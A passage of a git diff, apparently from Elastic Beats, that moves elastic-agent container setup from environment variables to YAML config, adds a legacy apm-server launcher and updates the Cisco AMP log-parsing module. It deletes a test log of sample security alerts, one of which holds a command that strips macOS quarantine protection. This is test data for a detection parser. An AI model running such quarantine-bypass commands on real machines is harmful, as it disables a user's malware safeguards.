fmt.Errorf("apm-server process exited with %d", apmProcState.ExitCode()) + } + return nil + }(); err != nil { + logError(streams, err) + } + + wg.Done() + // sending kill signal to current process (elastic-agent) + logInfo(streams, "Initiate shutdown elastic-agent.") + mainProc.Signal(syscall.SIGTERM) + }() + } + // run Elastic Agent; send termination signal to the + // legacy apm-server process if stopped + go func() { + if err := func() error { + // create configuration for Elastic Agent + cfg := defaultAccessConfig() + if err := readYaml(filepath.Join(paths.Config(), "fleet-setup.yml"), &cfg); err != nil { + return errors.New(err, "parsing fleet-setup.yml") + } + if err := readYaml(filepath.Join(paths.Config(), "credentials.yml"), &cfg); err != nil { + return errors.New(err, "parsing credentials.yml") + } + return containerCmd(streams, cmd, flags, cfg) + }(); err != nil { + logError(streams, err) + } + wg.Done() + // sending kill signal to APM Server + if apmProc != nil { + apmProc.Stop() + logInfo(streams, "Initiate shutdown legacy apm-server.") + } + }() + wg.Wait() + return nil +} + +func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, cfg setupConfig) error { var err error var client *kibana.Client executable, err := os.Executable() @@ -129,16 +216,13 @@ func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags } _, err = os.Stat(paths.AgentConfigFile()) - if !os.IsNotExist(err) && !envBool("FLEET_FORCE") { + if !os.IsNotExist(err) && !cfg.Fleet.Force { // already enrolled, just run the standard run return run(flags, streams) } - // Remove FLEET_SETUP in 8.x - // The FLEET_SETUP environment variable boolean is a fallback to the old name. The name was updated to - // reflect that its setting up Fleet in Kibana versus setting up Fleet Server. - if envBool("KIBANA_FLEET_SETUP", "FLEET_SETUP") { - client, err = kibanaClient() + if cfg.Kibana.Fleet.Setup { + client, err = kibanaClient(cfg.Kibana) if err != nil { return err } @@ -148,21 +232,21 @@ func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags return err } } - if envBool("FLEET_ENROLL", "FLEET_SERVER_ENABLE") { + if cfg.Fleet.Enroll { if client == nil { - client, err = kibanaClient() + client, err = kibanaClient(cfg.Kibana) if err != nil { return err } } var policy *kibanaPolicy - token := envWithDefault("", "FLEET_ENROLLMENT_TOKEN") + token := cfg.Fleet.EnrollmentToken if token == "" { - policy, err = kibanaFetchPolicy(client, streams) + policy, err = kibanaFetchPolicy(client, cfg, streams) if err != nil { return err } - token, err = kibanaFetchToken(client, policy, streams) + token, err = kibanaFetchToken(client, policy, streams, cfg.Fleet.TokenName) if err != nil { return err } @@ -171,7 +255,7 @@ func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags if policy != nil { policyID = policy.ID } - cmdArgs, err := buildEnrollArgs(token, policyID) + cmdArgs, err := buildEnrollArgs(cfg, token, policyID) if err != nil { return err } @@ -191,67 +275,56 @@ func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags return run(flags, streams) } -func buildEnrollArgs(token string, policyID string) ([]string, error) { +func buildEnrollArgs(cfg setupConfig, token string, policyID string) ([]string, error) { args := []string{"enroll", "-f"} - if envBool("FLEET_SERVER_ENABLE") { - connStr, err := buildFleetServerConnStr() + if cfg.FleetServer.Enable { + connStr, err := buildFleetServerConnStr(cfg.FleetServer) if err != nil { return nil, err } args = append(args, "--fleet-server", connStr) if policyID == "" { - policyID = envWithDefault("", "FLEET_SERVER_POLICY_ID") + policyID = cfg.FleetServer.PolicyID } if policyID != "" { args = append(args, "--fleet-server-policy", policyID) } - ca := envWithDefault("", "FLEET_SERVER_ELASTICSEARCH_CA", "ELASTICSEARCH_CA") - if ca != "" { - args = append(args, "--fleet-server-elasticsearch-ca", ca) + if cfg.FleetServer.Elasticsearch.CA != "" { + args = append(args, "--fleet-server-elasticsearch-ca", cfg.FleetServer.Elasticsearch.CA) } - host := envWithDefault("", "FLEET_SERVER_HOST") - if host != "" { - args = append(args, "--fleet-server-host", host) + if cfg.FleetServer.Host != "" { + args = append(args, "--fleet-server-host", cfg.FleetServer.Host) } - port := envWithDefault("", "FLEET_SERVER_PORT") - if port != "" { - args = append(args, "--fleet-server-port", port) + if cfg.FleetServer.Port != "" { + args = append(args, "--fleet-server-port", cfg.FleetServer.Port) } - cert := envWithDefault("", "FLEET_SERVER_CERT") - if cert != "" { - args = append(args, "--fleet-server-cert", cert) + if cfg.FleetServer.Cert != "" { + args = append(args, "--fleet-server-cert", cfg.FleetServer.Cert) } - certKey := envWithDefault("", "FLEET_SERVER_CERT_KEY") - if certKey != "" { - args = append(args, "--fleet-server-cert-key", certKey) + if cfg.FleetServer.CertKey != "" { + args = append(args, "--fleet-server-cert-key", cfg.FleetServer.CertKey) } - if envBool("FLEET_SERVER_INSECURE_HTTP") { + if cfg.FleetServer.InsecureHTTP { args = append(args, "--fleet-server-insecure-http") args = append(args, "--insecure") } } else { - url := envWithDefault("", "FLEET_URL") - if url == "" { + if cfg.Fleet.URL == "" { return nil, errors.New("FLEET_URL is required when FLEET_ENROLL is true without FLEET_SERVER_ENABLE") } - args = append(args, "--url", url) - if envBool("FLEET_INSECURE") { + args = append(args, "--url", cfg.Fleet.URL) + if cfg.Fleet.Insecure { args = append(args, "--insecure") } - ca := envWithDefault("", "FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA") - if ca != "" { - args = append(args, "--certificate-authorities", ca) + if cfg.Fleet.CA != "" { + args = append(args, "--certificate-authorities", cfg.Fleet.CA) } } - args = append(args, "--enrollment-token", token) - return args, nil + return append(args, "--enrollment-token", token), nil } -func buildFleetServerConnStr() (string, error) { - host := envWithDefault(defaultESHost, "FLEET_SERVER_ELASTICSEARCH_HOST", "ELASTICSEARCH_HOST") - username := envWithDefault(defaultUsername, "FLEET_SERVER_ELASTICSEARCH_USERNAME", "ELASTICSEARCH_USERNAME") - password := envWithDefault(defaultPassword, "FLEET_SERVER_ELASTICSEARCH_PASSWORD", "ELASTICSEARCH_PASSWORD") - u, err := url.Parse(host) +func buildFleetServerConnStr(cfg fleetServerConfig) (string, error) { + u, err := url.Parse(cfg.Elasticsearch.Host) if err != nil { return "", err } @@ -259,7 +332,7 @@ func buildFleetServerConnStr() (string, error) { if u.Path != "" { path += "/" + strings.TrimLeft(u.Path, "/") } - return fmt.Sprintf("%s://%s:%s@%s%s", u.Scheme, username, password, u.Host, path), nil + return fmt.Sprintf("%s://%s:%s@%s%s", u.Scheme, cfg.Elasticsearch.Username, cfg.Elasticsearch.Password, u.Host, path), nil } func kibanaSetup(client *kibana.Client, streams *cli.IOStreams) error { @@ -274,22 +347,22 @@ func kibanaSetup(client *kibana.Client, streams *cli.IOStreams) error { return nil } -func kibanaFetchPolicy(client *kibana.Client, streams *cli.IOStreams) (*kibanaPolicy, error) { +func kibanaFetchPolicy(client *kibana.Client, cfg setupConfig, streams *cli.IOStreams) (*kibanaPolicy, error) { var policies kibanaPolicies err := performGET(client, "/api/fleet/agent_policies", &policies, streams.Err, "Kibana fetch policy") if err != nil { return nil, err } - return findPolicy(policies.Items) + return findPolicy(cfg, policies.Items) } -func kibanaFetchToken(client *kibana.Client, policy *kibanaPolicy, streams *cli.IOStreams) (string, error) { +func kibanaFetchToken(client *kibana.Client, policy *kibanaPolicy, streams *cli.IOStreams, tokenName string) (string, error) { var keys kibanaAPIKeys err := performGET(client, "/api/fleet/enrollment-api-keys", &keys, streams.Err, "Kibana fetch token") if err != nil { return "", err } - key, err := findKey(keys.List, policy) + key, err := findKey(keys.List, policy, tokenName) if err != nil { return "", err } @@ -301,32 +374,26 @@ func kibanaFetchToken(client *kibana.Client, policy *kibanaPolicy, streams *cli. return keyDetail.Item.APIKey, nil } -func kibanaClient() (*kibana.Client, error) { - host := envWithDefault(defaultKibanaHost, "KIBANA_FLEET_HOST", "KIBANA_HOST") - username := envWithDefault(defaultUsername, "KIBANA_FLEET_USERNAME", "KIBANA_USERNAME", "ELASTICSEARCH_USERNAME") - password := envWithDefault(defaultPassword, "KIBANA_FLEET_PASSWORD", "KIBANA_PASSWORD", "ELASTICSEARCH_PASSWORD") - +func kibanaClient(cfg kibanaConfig) (*kibana.Client, error) { var tls *tlscommon.Config - ca := envWithDefault("", "KIBANA_FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA") - if ca != "" { + if cfg.Fleet.CA != "" { tls = &tlscommon.Config{ - CAs: []string{ca}, + CAs: []string{cfg.Fleet.CA}, } } return kibana.NewClientWithConfig(&kibana.ClientConfig{ - Host: host, - Username: username, - Password: password, + Host: cfg.Fleet.Host, + Username: cfg.Fleet.Username, + Password: cfg.Fleet.Password, IgnoreVersion: true, TLS: tls, }) } -func findPolicy(policies []kibanaPolicy) (*kibanaPolicy, error) { - fleetServerEnabled := envBool("FLEET_SERVER_ENABLE") - policyName := envWithDefault("", "FLEET_TOKEN_POLICY_NAME") - if fleetServerEnabled { - policyName = envWithDefault("", "FLEET_SERVER_POLICY_NAME", "FLEET_TOKEN_POLICY_NAME") +func findPolicy(cfg setupConfig, policies []kibanaPolicy) (*kibanaPolicy, error) { + policyName := cfg.Fleet.TokenPolicyName + if cfg.FleetServer.Enable { + policyName = cfg.FleetServer.PolicyName } for _, policy := range policies { if policy.Status != "active" { @@ -336,7 +403,7 @@ func findPolicy(policies []kibanaPolicy) (*kibanaPolicy, error) { if policyName == policy.Name { return &policy, nil } - } else if fleetServerEnabled { + } else if cfg.FleetServer.Enable { if policy.IsDefaultFleetServer { return &policy, nil } @@ -349,8 +416,7 @@ func findPolicy(policies []kibanaPolicy) (*kibanaPolicy, error) { return nil, fmt.Errorf(`unable to find policy named "%s"`, policyName) } -func findKey(keys []kibanaAPIKey, policy *kibanaPolicy) (*kibanaAPIKey, error) { - tokenName := envWithDefault(defaultTokenName, "FLEET_TOKEN_NAME") +func findKey(keys []kibanaAPIKey, policy *kibanaPolicy, tokenName string) (*kibanaAPIKey, error) { for _, key := range keys { name := strings.TrimSpace(tokenNameStrip.ReplaceAllString(key.Name, "")) if name == tokenName && key.PolicyID == policy.ID { @@ -437,6 +503,71 @@ func truncateString(b []byte) string { return strings.Replace(string(runes), "\n", " ", -1) } +// runLegacyAPMServer extracts the bundled apm-server from elastic-agent +// to path and runs it with args. +func runLegacyAPMServer(streams *cli.IOStreams, path string, args []string) (*process.Info, error) { + name := "apm-server" + logInfo(streams, "Preparing apm-server for legacy mode.") + cfg := artifact.DefaultConfig() + + logInfo(streams, fmt.Sprintf("Extracting apm-server into install directory %s.", path)) + installer, err := tar.NewInstaller(cfg) + if err != nil { + return nil, errors.New(err, "creating installer") + } + spec := program.Spec{Name: name, Cmd: name, Artifact: name} + version := release.Version() + if release.Snapshot() { + version = fmt.Sprintf("%s-SNAPSHOT", version) + } + // Extract the bundled apm-server binary into the APM_SERVER_PATH + if err := installer.Install(context.Background(), spec, version, path); err != nil { + return nil, errors.New(err, + fmt.Sprintf("installing %s (%s) from %s to %s", spec.Name, version, cfg.TargetDirectory, path)) + } + + // Start apm-server process respecting args + logInfo(streams, "Starting legacy apm-server daemon as a subprocess.") + pattern := filepath.Join(path, fmt.Sprintf("%s-%s-%s*", spec.Cmd, version, cfg.OS()), spec.Cmd) + files, err := filepath.Glob(pattern) + if err != nil { + return nil, errors.New(err, fmt.Sprintf("searching apm-server in %s", pattern)) + } + if len(files) != 1 { + return nil, errors.New("multiple apm-server versions installed") + } + f, err := filepath.Abs(files[0]) + if err != nil { + return nil, errors.New(err, fmt.Sprintf("absPath for %s", files[0])) + } + log, err := logger.New("apm-server") + if err != nil { + return nil, err + } + // add APM Server specific configuration + addEnv := func(arg, env string) { + if v := os.Getenv(env); v != "" { + args = append(args, arg, v) + } + } + addEnv("--path.config", "APM_SERVER_CONFIG_PATH") + addEnv("--path.data", "APM_SERVER_DATA_PATH") + addEnv("--path.logs", "APM_SERVER_LOGS_PATH") + addEnv("--httpprof", "APM_SERVER_HTTPPROF") + return process.Start(log, f, nil, os.Geteuid(), os.Getegid(), args...) +} + +func readYaml(f string, cfg *setupConfig) error { + c, err := config.LoadFile(f) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + return c.Unpack(cfg) +} + type kibanaPolicy struct { ID string `json:"id"` Name string `json:"name"` @@ -464,3 +595,96 @@ type kibanaAPIKeys struct { type kibanaAPIKeyDetail struct { Item kibanaAPIKey `json:"item"` } + +// setup configuration + +type setupConfig struct { + Fleet fleetConfig `config:"fleet"` + FleetServer fleetServerConfig `config:"fleet_server"` + Kibana kibanaConfig `config:"kibana"` +} + +type elasticsearchConfig struct { + CA string `config:"ca"` + Host string `config:"host"` + Username string `config:"username"` + Password string `config:"password"` +} + +type fleetConfig struct { + CA string `config:"ca"` + Enroll bool `config:"enroll"` + EnrollmentToken string `config:"enrollment_token"` + Force bool `config:"force"` + Insecure bool `config:"insecure"` + TokenName string `config:"token_name"` + TokenPolicyName string `config:"token_policy_name"` + URL string `config:"url"` +} + +type fleetServerConfig struct { + Cert string `config:"cert"` + CertKey string `config:"certKey"` + Elasticsearch elasticsearchConfig `config:"elasticsearch"` + Enable bool `config:"enable"` + Host string `config:"host"` + InsecureHTTP bool `config:"insecure_http"` + PolicyID string `config:"policy_id"` + PolicyName string `config:"policy_name"` + Port string `config:"port"` +} + +type kibanaConfig struct { + Fleet kibanaFleetConfig `config:"fleet"` +} + +type kibanaFleetConfig struct { + CA string `config:"ca"` + Host string `config:"host"` + Password string `config:"password"` + Setup bool `config:"setup"` + Username string `config:"username"` +} + +func defaultAccessConfig() setupConfig { + return setupConfig{ + Fleet: fleetConfig{ + CA: envWithDefault("", "FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA"), + Enroll: envBool("FLEET_ENROLL", "FLEET_SERVER_ENABLE"), + EnrollmentToken: envWithDefault("", "FLEET_ENROLLMENT_TOKEN"), + Force: envBool("FLEET_FORCE"), + Insecure: envBool("FLEET_INSECURE"), + TokenName: envWithDefault("Default", "FLEET_TOKEN_NAME"), + TokenPolicyName: envWithDefault("", "FLEET_TOKEN_POLICY_NAME"), + URL: envWithDefault("", "FLEET_URL"), + }, + FleetServer: fleetServerConfig{ + Cert: envWithDefault("", "FLEET_SERVER_CERT"), + CertKey: envWithDefault("", "FLEET_SERVER_CERT_KEY"), + Elasticsearch: elasticsearchConfig{ + Host: envWithDefault("http://elasticsearch:9200", "FLEET_SERVER_ELASTICSEARCH_HOST", "ELASTICSEARCH_HOST"), + Username: envWithDefault("elastic", "FLEET_SERVER_ELASTICSEARCH_USERNAME", "ELASTICSEARCH_USERNAME"), + Password: envWithDefault("changeme", "FLEET_SERVER_ELASTICSEARCH_PASSWORD", "ELASTICSEARCH_PASSWORD"), + CA: envWithDefault("", "FLEET_SERVER_ELASTICSEARCH_CA", "ELASTICSEARCH_CA"), + }, + Enable: envBool("FLEET_SERVER_ENABLE"), + Host: envWithDefault("", "FLEET_SERVER_HOST"), + InsecureHTTP: envBool("FLEET_SERVER_INSECURE_HTTP"), + PolicyID: envWithDefault("", "FLEET_SERVER_POLICY_ID"), + PolicyName: envWithDefault("", "FLEET_SERVER_POLICY_NAME", "FLEET_TOKEN_POLICY_NAME"), + Port: envWithDefault("", "FLEET_SERVER_PORT"), + }, + Kibana: kibanaConfig{ + Fleet: kibanaFleetConfig{ + // Remove FLEET_SETUP in 8.x + // The FLEET_SETUP environment variable boolean is a fallback to the old name. The name was updated to + // reflect that its setting up Fleet in Kibana versus setting up Fleet Server. + Setup: envBool("KIBANA_FLEET_SETUP", "FLEET_SETUP"), + Host: envWithDefault("http://kibana:5601", "KIBANA_FLEET_HOST", "KIBANA_HOST"), + Username: envWithDefault("elastic", "KIBANA_FLEET_USERNAME", "KIBANA_USERNAME", "ELASTICSEARCH_USERNAME"), + Password: envWithDefault("changeme", "KIBANA_FLEET_PASSWORD", "KIBANA_PASSWORD", "ELASTICSEARCH_PASSWORD"), + CA: envWithDefault("", "KIBANA_FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA"), + }, + }, + } +} diff --git a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml index de20fe61484..ff246eeaa45 100644 --- a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml +++ b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml @@ -160,7 +160,7 @@ description: > SHA1 hash of the archived file related to the malicious event. - - name: file.archived_file.identify.sha256 + - name: file.archived_file.identity.sha256 type: keyword description: > SHA256 hash of the archived file related to the malicious event. @@ -265,7 +265,27 @@ description: > List of all MITRE tactics related to the incident found. + - name: mitre_tactics + type: keyword + description: > + Array of all related mitre tactic ID's + - name: techniques type: flattened description: > - List of all MITRE techniques related to the incident found. \ No newline at end of file + List of all MITRE techniques related to the incident found. + + - name: mitre_techniques + type: keyword + description: > + Array of all related mitre technique ID's + + - name: command_line.arguments + type: keyword + description: > + The CLI arguments related to the Cloud Threat IOC reported by Cisco. + + - name: bp_data + type: flattened + description: > + Endpoint isolation information \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/config/config.yml b/x-pack/filebeat/module/cisco/amp/config/config.yml index 8e4695d7458..0aa38440947 100644 --- a/x-pack/filebeat/module/cisco/amp/config/config.yml +++ b/x-pack/filebeat/module/cisco/amp/config/config.yml @@ -62,14 +62,14 @@ processors: fields: [message] target: json - if: - has_fields: ["json.data.id"] + has_fields: ["json.data.detection_id"] then: - fingerprint: - fields: ["json.data.id"] + fields: ["json.data.detection_id"] target_field: "@metadata._id" else: - fingerprint: - fields: ["json.data.timestamp", "json.data.event_type_id", "json.data.connector_guid"] + fields: ["json.data.timestamp", "json.data.timestamp_nanoseconds", "json.data.event_type_id", "json.data.connector_guid"] target_field: "@metadata._id" - add_fields: target: '' diff --git a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml index b77c3be1f9c..b75214cc297 100644 --- a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml +++ b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml @@ -76,6 +76,15 @@ processors: ignore_failure: true if: ctx?.cisco?.amp?.start_timestamp != null +- rename: + field: cisco.amp.techniques + target_field: cisco.amp.mitre_techniques + if: "ctx?.cisco?.amp?.techniques != null && ctx?.cisco?.amp?.techniques.length > 0 && ctx?.cisco?.amp?.techniques[0] instanceof String" +- rename: + field: cisco.amp.tactics + target_field: cisco.amp.mitre_tactics + if: "ctx?.cisco?.amp?.tactics != null && ctx?.cisco?.amp?.tactics.length > 0 && ctx?.cisco?.amp?.tactics[0] instanceof String" + ###################### ## ECS Host Mapping ## ###################### @@ -189,6 +198,10 @@ processors: field: cisco.amp.file.parent.process_id target_field: process.pid ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.process_id + target_field: process.pid + ignore_missing: true - rename: field: cisco.amp.file.parent.file_name target_field: process.name @@ -205,10 +218,9 @@ processors: field: cisco.amp.file.parent.identity.md5 target_field: process.hash.md5 ignore_missing: true - - rename: - field: cisco.amp.network_info.parent.process_id - target_field: process.pid + field: cisco.amp.file.parent.identity.md5 + target_field: process.hash.md5 ignore_missing: true - rename: field: cisco.amp.network_info.parent.file_name @@ -300,21 +312,39 @@ processors: value: "{{ cisco.amp.computer.external_ip }}" if: ctx?.cisco?.amp?.computer?.external_ip != null allow_duplicates: false -- foreach: - field: cisco.amp.computer.network_addresses - processor: - append: - field: related.ip - value: "{{ _ingest._value.ip }}" - allow_duplicates: false +- script: + lang: painless + source: | + if (ctx?.related == null) { + ctx.related = new HashMap(); + } + if (ctx?.related?.ip == null) { + ctx.related.ip = new ArrayList(); + } + for (addr in ctx?.cisco?.amp?.computer?.network_addresses) { + if (addr.ip != null && !addr.ip.isEmpty()) { + if (!ctx?.related?.ip.contains(addr.ip)) { + ctx?.related?.ip.add(addr.ip); + } + } + } if: ctx?.cisco?.amp?.computer?.network_addresses != null -- foreach: - field: cisco.amp.computer.network_addresses - processor: - append: - field: cisco.amp.related.mac - value: "{{ _ingest._value.mac }}" - allow_duplicates: false +- script: + lang: painless + source: | + if (ctx?.cisco?.amp?.related == null) { + ctx.cisco.amp.related = new HashMap(); + } + if (ctx?.cisco?.amp?.related?.mac == null) { + ctx.cisco.amp.related.mac = new ArrayList(); + } + for (addr in ctx?.cisco?.amp?.computer?.network_addresses) { + if (addr.mac != null && !addr.mac.isEmpty()) { + if (!ctx?.cisco?.amp?.related?.mac.contains(addr.mac)) { + ctx?.cisco?.amp?.related?.mac.add(addr.mac); + } + } + } if: ctx?.cisco?.amp?.computer?.network_addresses != null - foreach: field: cisco.amp.vulnerabilities diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log deleted file mode 100644 index 14599ecfc0c..00000000000 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log +++ /dev/null @@ -1,8 +0,0 @@ -{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":153000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.22gp.1201","detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"user@domain","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:ac:af:1d:ad"},{"ip":"192.168.120.1","mac":"12:24:56:c2:00:01"},{"ip":"192.168.160.1","mac":"12:50:56:c2:53:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","file_name":"HYXiN3hY.exe.part","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part","identity":{"sha256":"e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc","sha1":"d0c4192b65e36553fvfd2b83f3113f6ae8390baa","md5":"9a8557b98ed1469272fa0ace91d63477"},"parent":{"process_id":88,"disposition":"Unknown","file_name":"firefox.exe","identity":{"sha256":"a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab","sha1":"d539afb0991e823c7cdf824b610a5a5d7655a2da","md5":"e50ab86d5409d4d0ad386b27ea7f78fb"}}}}} -{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":163000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:bb:af:22:fd"},{"ip":"192.168.120.1","mac":"00:52:12:c0:11:01"},{"ip":"192.168.160.1","mac":"01:51:56:c0:c2:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","identity":{"sha256":"e678899d7ea9702184167b56655f91a69f8a0bdc9df65612762252c053c2cd7c"}}}} -{"data":{"id":123578990,"timestamp":1605085728,"timestamp_nanoseconds":183000000,"date":"2020-11-11T09:08:48+00:00","event_type":"Exploit Prevention","event_type_id":1090519103,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"uuser@domain","active":true,"network_addresses":[{"ip":"192.1.1.1","mac":"av:1d:13:a2:21:1f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235","trajectory":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","identity":{"sha256":"2262a4766bc394b4cb2d658144b207183ff23a3039121cd74e615ab64e6e57d6","sha1":"22643e8613bb0dd90888b17367007489fe16693e4","md5":"bcc2a6493e0641bb1e60cbf640169e579"},"parent":{"process_id":7328,"disposition":"Unknown","file_name":"OfficeSetup.exe","identity":{"sha256":"a6d1aa0df1c23eb8b7563245082ed2eddf00e3da62cbeb41ac701123vasce927f465d","sha1":"90d3a389307ag2a7fbv8726502077b69ab0fd79a0","md5":"6a262b4af012ec81ffeb36f5faf70311"}},"attack_details":{"application":"powershell.exe","attacked_module":"Script Control:System.Management.Automation.dll","base_address":"0x000F0000","suspicious_files":[""],"indicators":[{"MITRE_Tactic":[{"tactic_id":"TA0002","name":"Execution"}],"severity":"medium","description":"A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.","short_description":"Excessively long PowerShell command detected","id":123578990,"MITRE_Technique":[{"tehcnique_id":"T1086","name":"PowerShell","technique_id":"T1086"}]}]}}}} -{"data":{"id":123578990,"timestamp":1605084750,"timestamp_nanoseconds":736000000,"date":"2020-11-11T08:52:30+00:00","event_type":"File Fetch Failed","event_type_id":2164260910,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"error":{"error_code":3240099848,"description":"File not found"},"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.184","mac":"av:6b:fc:23:a1:29"},{"ip":"192.168.2.1","mac":"00:50:24:c0:01:01"},{"ip":"192.168.12.1","mac":"55:50:22:c0:12:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd","trajectory":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Unknown","file_name":"setup.exe","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\somezip.zip\\Visual_install\\setup.exe","identity":{"sha256":"a8b424b65d1550c87b531f7a14523bvdf982d8f869976f99fa1cef5342ausdy"}}}} -{"data":{"id":123578990,"timestamp":1605079734,"timestamp_nanoseconds":24000000,"date":"2020-11-11T07:28:54+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","start_timestamp":1605079733,"start_date":"2020-11-11T07:28:53+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.2","mac":"ac:aa:22:00:11:55"},{"ip":"192.168.228.70","mac":"f2:18:12:75:55:12"},{"ip":"192.12.52.12","mac":"65:29:8f:97:04:ea"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-1235213","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-123512/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"cloud_ioc":{"description":"A process was seen whitelisting/restoring a file from quarantine. This is an uncommon task, and warrants further investigation as OS X is not known to quarantine files unnecessarily. This is also known to be part of the Mitre Att&ck Framework, technique T1144.","short_description":"OSX.QuarantineExclusion.ioc"},"file":{"disposition":"Clean","file_name":"sudo","file_path":"file:///usr/bin/sudo","identity":{"sha256":"123dfsdg234b7ba3d5ff63033129fa1b96975ad124sdgasdf1sdf"},"parent":{"disposition":"Clean","identity":{"sha256":"sadgf234643sdaffee7a9bd309a4123sdfag9523e8b152123sdfgdfsf2"}}},"command_line":{"arguments":"sudo /usr/bin/xattr -r -d com.apple.quarantine uTorrent.app"},"tactics":["TA0005"],"techniques":["T1144"]}} -{"data":{"id":123578990,"timestamp":1605079353,"timestamp_nanoseconds":170000000,"date":"2020-11-11T07:22:33+00:00","event_type":"File Fetch 